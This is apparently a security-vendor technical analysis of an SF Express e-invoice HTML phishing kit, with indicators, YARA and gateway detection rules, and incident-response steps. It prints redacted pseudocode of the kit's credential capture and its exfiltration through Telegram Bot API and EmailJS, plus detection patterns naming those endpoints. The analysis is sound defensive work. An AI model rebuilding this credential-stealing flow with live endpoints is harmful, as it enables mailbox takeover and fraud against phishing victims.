SF Express E-Invoice HTML Phishing Kit: Technical Analysis

Daniel Zimmermann
18 Min Read
Technical diagram-style poster for an SF Express e-invoice HTML phishing kit using Telegram API and EmailJS exfiltration.
Technical poster for the SF Express e-invoice HTML phishing kit analysis, with attacker secrets redacted.

An SF Express e-invoice phishing email we analyzed used a self-contained HTML attachment to collect mailbox passwords, enrich the victim profile with IP/geolocation data, exfiltrate the result through Telegram Bot API and EmailJS, then redirect the user to the legitimate SF Express website as a decoy. Static analysis did not show a browser exploit, macro, or drive-by payload in this sample. The proven risk is credential theft, mailbox takeover, password reuse, and downstream invoice/BEC fraud.

Executive verdict for defenders

  • Delivery: Chinese SF Express e-invoice lure with an HTML attachment named sf-express-ikw (1).html.
  • Sender infrastructure: mail.cofoxpft[.]com on 173.254.205.139; parent domain registered on June 28, 2026, six days before the message date.
  • Mail authentication: SPF passed through the forwarding route, while DMARC failed for the visible sender domain.
  • Attachment behavior: fake SF Express login screen, prefilled victim email, password capture, two fake 密码错误 responses, then a client-side redirect to https://www.sf-express.com/chn/en.
  • Exfiltration: Telegram Bot API via image GET requests and EmailJS via API POST. Attacker token, chat IDs, and EmailJS key are intentionally redacted here.
  • Response priority: if a password was entered, treat the mailbox as exposed even if the user ended up on the real SF Express site.
Safe reconstructed email client mockup showing a Chinese SF Express e-invoice phishing lure with an HTML attachment.
Safe reconstructed mockup of the email lure. The actual recipient address and reusable attacker secrets are not shown.

This is a reputation and defender-focused teardown, not a generic “do not click attachments” note. The sample is useful because it combines several patterns email-security teams now see often: local HTML phishing, newly registered sender infrastructure, legitimate cloud/form services used as exfiltration channels, and a legitimate final redirect that makes user reports sound less suspicious.

Sample metadata and hashes

Observed subject *** SPAM *** 【电子发票号码:4203290】您收到一张新的电子发票
Visible sender SF發票 <[email protected][.]com>
Message date Sat, 04 Jul 2026 23:26:38 +0900
EML SHA-256 6dd68cc6b96d3a317311435216e7010b16ffcf8f60d54812bc7ffdf778b17897
HTML body SHA-256 8864f72385276a8f6c5b116066112f735b5fc2cdf3b470209d2f1ca763889676
Attachment sf-express-ikw (1).html, UTF-8 HTML, 79,335 bytes
Attachment SHA-256 64318fb6dc6064c2e5a6c42e269962a73300c59162c3403181e95679e0ce81d4
Static verdict Credential phishing. No static evidence of a browser exploit or malware dropper in this sample.

The lure body is short and routine: the recipient is told that an SF Express electronic invoice has been generated and that the attachment should be checked. This matters for filtering because the social engineering payload is not in the message body. The payload is the local HTML file.

Email headers and sender infrastructure

The sender domain is not an SF Express domain. RDAP and DNS checks during analysis showed cofoxpft[.]com registered on June 28, 2026, with A and MX records pointing mail flow to 173.254.205.139. The domain also published a narrow SPF policy: v=spf1 mx ip4:173.254.205.139 -all.

Signal Observed value Defender interpretation
Visible domain cofoxpft[.]com Brand mismatch; not an SF Express sender domain.
Domain age Registered June 28, 2026 Fresh domain shortly before the July 4, 2026 message.
SMTP source 173.254.205.139 Matches the suspicious sender infrastructure, not official courier mail.
SPF Pass through forwarding route SPF pass alone is not brand authentication.
DMARC Fail for header.from=cofoxpft[.]com High-value signal when combined with brand impersonation and an HTML attachment.

Official SF Express warnings have repeatedly told customers to verify sender domains and avoid suspicious attachments or links. That context is consistent with this sample, but the attachment analysis is what proves the credential-theft behavior.

Attachment static triage

The attachment is not a PDF invoice. It is an HTML application that renders a fake Chinese SF Express login page from a local file context. The form uses an email field, a password field, “remember me” style UI, privacy/service checkboxes, and a login button. The email field is prefilled with the recipient address in the sample; the published mockup above replaces it with a neutral example.

The HTML contains no useful form action. Submission is intercepted by JavaScript. That means gateway filters that only check form action destinations can miss the real exfiltration path. The suspicious behavior is in the script block: Base64-decoded constants, form interception, API calls for IP/geolocation, two outbound exfiltration methods, a retry loop, and final redirect logic.

Flow diagram showing an SF Express e-invoice HTML attachment collecting credentials, enriching IP data, sending to Telegram and EmailJS, and redirecting to the legitimate SF Express site.
Static flow reconstructed from the attachment: local HTML login, IP/geolocation enrichment, Telegram and EmailJS exfiltration, password-error loop, and final decoy redirect.

Sequence diagram

The static flow is compact enough to express as a sequence. If your CMS or notebook renders Mermaid, this block becomes a diagram; otherwise it remains a readable hunt map.

sequenceDiagram
    participant User
    participant LocalHTML as sf-express-ikw (1).html
    participant Ipify as api.ipify.org
    participant Ipapi as ipapi.co
    participant Telegram as Telegram Bot API
    participant EmailJS as EmailJS API
    participant SF as Legitimate SF Express site
    User->>LocalHTML: opens HTML attachment
    User->>LocalHTML: enters email password
    LocalHTML->>Ipify: fetch public IP
    LocalHTML->>Ipapi: fetch geolocation
    LocalHTML->>Telegram: send redacted credential report
    LocalHTML->>EmailJS: POST same report
    LocalHTML-->>User: show 密码错误 on early attempts
    LocalHTML->>SF: redirect after repeated attempts

JavaScript deobfuscation: constants and control flow

The kit uses atob() to decode operational constants at runtime. This is light obfuscation, not a packer. It is enough to hide obvious strings from casual inspection while still being easy to recover during static triage.

Decoded group Purpose Published value
Telegram token Bot authentication for /sendMessage <redacted bot token>
Telegram chat IDs Two destinations for the stolen credential report <redacted chat id 1>, <redacted chat id 2>
EmailJS identifiers Service ID, template ID, public key for API email delivery <redacted EmailJS values>
IP enrichment Public IP and geolocation lookup api.ipify.org?format=json, ipapi.co/json/
IP report link Clickable IP detail URL in attacker message geodatatool.com/?IP=
Decoy redirect Final destination after repeated attempts www.sf-express.com/chn/en

A redacted version of the submit path looks like this:

// Pseudocode reconstructed from the attachment; attacker secrets removed.
loginForm.addEventListener("submit", function (event) {
  event.preventDefault();
  attempts += 1;

  const email = emailInput.value;
  const password = passwordInput.value;

  collectIpAndGeo()
    .then(context => buildCredentialReport(email, password, context))
    .then(report => {
      sendToTelegram("<redacted bot token>", ["<chat 1>", "<chat 2>"], report);
      postToEmailJS("<service>", "<template>", "<public key>", report);
    });

  if (attempts < 3) {
    showError("密码错误");
  } else {
    window.location.href = "https://www.sf-express.com/chn/en";
  }
});

The formatted report contains the email address, password, browser/user-agent details, location string, public IP, date, derived email domain, and a suggested login URL derived from the email domain. For common mailbox providers, the script maps domains such as Gmail, Outlook, Yahoo, Proton, Zoho, iCloud, GMX, Rediff, Yandex, and Mail.ru to familiar login URLs. For other domains it falls back to https://mail.<domain>.

Exfiltration chain: Telegram and EmailJS

The Telegram branch uses a browser image object to request the Bot API /sendMessage endpoint. That is a useful detection clue because it can move credential data without a visible form action, XHR label, or external fake-login host.

// Deweaponized shape only. Token, chat IDs, and message body removed.
for (const chatId of ["<chat id 1>", "<chat id 2>"]) {
  const img = new Image();
  img.src = "https://api.telegram.org/bot<redacted>/sendMessage"
          + "?chat_id=" + encodeURIComponent(chatId)
          + "&text=" + encodeURIComponent("<redacted report>");
}

The EmailJS branch sends a JSON body to https://api.emailjs.com/api/v1.0/email/send. EmailJS is legitimate developer infrastructure, and Telegram is a legitimate messaging platform. The malicious signal is the combination: a local HTML invoice attachment with a password field, encoded service constants, IP/geolocation enrichment, credential formatting, and two independent exfiltration paths.

AhnLab ASEC documented a very similar Chinese e-invoice subject pattern and an SF e-invoice HTML/PDF masquerade in earlier phishing trends. This sample fits that family, with current infrastructure and a fresh sender domain, while the Telegram and EmailJS details come from the redacted static analysis of the submitted attachment.

Password-error loop and final redirect

The page shows 密码错误 for the first two submissions. That retry loop is operationally useful for attackers because users often try a second password when the first one “fails.” After the third attempt, the script redirects the browser to the legitimate SF Express English site. The redirect does not clean the earlier submissions; it only gives the user a plausible ending.

For responders, this is a reporting trap. A user may say, “It opened the real SF Express site in the end.” That statement can be true and still mean credentials were already sent to Telegram and EmailJS.

Indicators and observables

Type Indicator Role
Sender domain cofoxpft[.]com Visible sender domain, not SF Express.
Mail host mail.cofoxpft[.]com SMTP sender host in the sample.
IP address 173.254.205.139 Sender infrastructure observed for the email.
Attachment name sf-express-ikw (1).html HTML credential-phishing attachment.
Attachment SHA-256 64318fb6dc6064c2e5a6c42e269962a73300c59162c3403181e95679e0ce81d4 File hash for sample matching.
EML SHA-256 6dd68cc6b96d3a317311435216e7010b16ffcf8f60d54812bc7ffdf778b17897 Message container hash.
Exfil endpoint api.telegram.org/bot.../sendMessage Credential report sent through Telegram Bot API.
Exfil endpoint api.emailjs.com/api/v1.0/email/send Credential report sent through EmailJS.
Enrichment api.ipify.org?format=json, ipapi.co/json/ Public IP and geolocation lookup.
Decoy redirect www.sf-express.com/chn/en Legitimate site used after repeated credential attempts.

Detection ideas for SOC and email-security teams

Do not build a rule that only says “SF Express” or only blocks Telegram. The more durable detection is the cluster of behaviors.

Control point Hunt or rule idea
Mail gateway Flag HTML attachments with Chinese invoice wording, brand mismatch, recent sender domain, and password inputs inside the attachment.
Static file scanning Look for type="password", addEventListener("submit", event.preventDefault(), atob(, and a final legitimate-brand redirect in the same HTML file.
Proxy/DNS logs From browser sessions that opened local files, hunt for clustered calls to api.ipify.org, ipapi.co, api.telegram.org, and api.emailjs.com.
EDR/browser telemetry Correlate a saved .html attachment opening in the browser with immediate credential-entry form behavior and outbound service calls.
SIEM enrichment Raise severity when DMARC failure, new sender domain, HTML attachment, and exfil-service strings appear together.

A YARA-like static rule for controlled environments could use the following structure. Treat it as a starting point, not a production-ready rule:

rule HTML_Phish_Telegram_EmailJS_IpGeo_SF_Invoice
{
  meta:
    description = "Local HTML credential phishing with Telegram, EmailJS, IP enrichment, and SF e-invoice lure"
  strings:
    $pw = "type="password"" ascii nocase
    $submit = "preventDefault()" ascii
    $b64 = "atob(" ascii
    $tg = "api.telegram.org/bot" ascii
    $emailjs = "api.emailjs.com/api/v1.0/email/send" ascii
    $ipify = "api.ipify.org?format=json" ascii
    $ipapi = "ipapi.co/json" ascii
    $sf = "sf-express.com/chn/en" ascii
    $zh = "密码错误" wide ascii
  condition:
    filesize < 300KB and $pw and $submit and $b64 and 3 of ($tg, $emailjs, $ipify, $ipapi, $sf, $zh)
}

A mail-gateway rule can be less code-centric and more operational:

title: Courier invoice HTML attachment with credential exfiltration indicators
selection:
  attachment_extension: ".html"
  subject_contains_any:
    - "电子发票号码"
    - "e-invoice"
  attachment_contains_all:
    - "type="password""
    - "preventDefault"
  attachment_contains_any:
    - "api.telegram.org"
    - "api.emailjs.com"
    - "api.ipify.org"
    - "ipapi.co"
condition: selection
severity: high

Risk assessment and limits

The static evidence proves credential harvesting intent. It does not prove that the browser was exploited just by previewing the file, and it does not prove a malware dropper in this specific attachment. That distinction matters for incident handling. An opened-only case is not the same as a credential-entered case.

Dynamic analysis was intentionally avoided for publication because calling the live Telegram or EmailJS paths could notify the operator, validate the sample, or expose secrets. Infrastructure verdicts can also change quickly: a domain or API key that is live at analysis time may be blocked later, and a parked domain can change owners or content.

Incident response: opened only vs credentials entered

Scenario Response priority
User received the email but did not open the attachment Preserve the EML, block sender/domain indicators, add detection for similar subjects and attachments, and educate the mailbox owner.
User opened the HTML but did not submit credentials Collect the file hash, remove the attachment, review proxy/DNS logs for external API calls, and scan if the file was saved or browser/security alerts appeared.
User entered one or more passwords Reset the mailbox password from a clean device, revoke sessions/tokens, check MFA, audit inbox rules/forwarders, inspect recent logins, and treat reused passwords as exposed.
Business mailbox was involved Review sent mail, payment/invoice conversations, delegated access, OAuth grants, mail rules, and recent external replies for BEC activity.
Follow-on files or alerts appeared Handle as a broader endpoint incident: isolate if needed, scan for downloaded payloads, review browser extensions and startup items, then reimage if persistence remains unclear.

If the attachment was downloaded or opened on a workstation and there are follow-on detections, suspicious downloads, browser changes, or repeated alerts, scan before you trust the endpoint again. Gridinsoft Anti-Malware can check for downloaded payloads, persistence, unwanted browser changes, and suspicious leftovers around the phishing event.

Check the endpoint after a phishing attachment

If the process path is wrong, the name imitates a Windows component, or high CPU started after an unknown installer, scan for hidden miners, services, startup entries, and bundled components.

Scan suspicious leftovers

For broader context on local HTML phishing attachments, use our HTML/Fraud Trojan guide. For a neighboring courier-lure pattern, compare the FedEx and DHL shipping document scam. If you need a user-facing checklist, start with how to spot a phishing email.

FAQ

Is the SF Express e-invoice HTML attachment malware?

This sample is best classified as credential phishing. It is an HTML file that captures email passwords and sends them to attacker-controlled destinations. Static analysis did not show a browser exploit or standalone malware payload in the attachment.

Does the final redirect to the real SF Express website make it safe?

No. The redirect happens after the submission logic. A victim can land on the legitimate SF Express site after the password was already sent through Telegram and EmailJS.

Why do attackers use Telegram and EmailJS?

Both are legitimate services that can be reached from normal browsers. Attackers abuse that reputation to avoid hosting their own obvious phishing collector and to receive stolen data quickly.

What should defenders block first?

Block the sender infrastructure and exact hashes, but also hunt for the pattern: HTML attachment, password input, JavaScript submit interception, IP/geolocation enrichment, and calls to Telegram or EmailJS from a local file context.

What if a user only opened the HTML file?

If no credentials were submitted, credential theft is less likely for this sample. Still preserve the file, remove it, check browser/proxy telemetry, and scan if a download, extension, or security alert followed.

References

  1. AhnLab ASEC. “Weekly Phishing Email Threat Trends.” AhnLab, June 2023, accessed July 5, 2026. https://asec.ahnlab.com/en/54163/
  2. SF Express Taiwan. “Important Notice: Malicious Phishing Emails Posing as Taiwan S.F. Express.” SF Express, accessed July 5, 2026. https://htm.sf-express.com/tw/en/news/detail/Important-Notice-Malicious-Phishing-Emails-Posing-as-Taiwan-S.F.-Express/
  3. Hong Kong Anti-Deception Coordination Centre. “Fraudulent website related to SFHK.” ADCC, accessed July 5, 2026. https://www.adcc.gov.hk/en-hk/alerts-detail/alerts-1444920519278264322.html
Share This Article
With a strong background in consumer safety and fraud prevention, Daniel specializes in providing actionable tips and advice to users. His focus is on helping individuals understand the risks of interacting with fraudulent sites and services
Leave a Comment

AI Assistant

Hello! 👋 How can I help you today?